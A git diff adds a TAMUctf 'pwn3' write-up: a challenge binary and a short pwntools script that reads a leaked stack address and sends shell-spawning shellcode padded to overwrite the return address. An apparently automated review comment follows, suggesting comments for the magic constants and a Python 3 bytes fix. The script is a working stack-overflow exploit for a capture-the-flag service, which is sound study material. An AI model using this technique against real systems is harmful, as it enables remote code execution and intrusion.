diff --git a/tamu-writeup/pwn3 b/tamu-writeup/pwn3
new file mode 100644
index 0000000..e66f5b7
Binary files /dev/null and b/tamu-writeup/pwn3 differ
diff --git a/tamu-writeup/pwn3wp.py b/tamu-writeup/pwn3wp.py
new file mode 100644
index 0000000..bf9db51
--- /dev/null
+++ b/tamu-writeup/pwn3wp.py
@@ -0,0 +1,6 @@
+from pwn import *
+sh = remote("pwn.tamuctf.com", 4323)
+p = p32(int(sh.recvline()[-12:-2], 16))
+pld = asm(shellcraft.sh()).ljust(0x12a + 4, 'a') + p
+sh.sendline(pld)
+sh.interactive()
\ No newline at end of file
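Review bot: The constants on the `p = ...` and `pld = ...` lines (`[-12:-2]` and `0x12a + 4`) are undocumented, so a reader of this writeup cannot tell what the service prints or how the padding length was derived from the binary. I would add a comment above each, e.g. `# banner line ends with a 10-char 0x-prefixed address plus two trailing characters` and `# 0x12a: presumably buffer-to-saved-frame-pointer distance, +4 for the saved frame pointer; confirm against the disassembly`. Separately, under Python 3 `asm()` returns bytes, so `.ljust(0x12a + 4, 'a')` with a str fill raises TypeError; `b'a'` works on both Python 2 and 3. The script appears to depend on the service disclosing a stack address and on that memory being executable, so the writeup would teach more if it stated which mitigations (NX, stack canary) the binary was built without.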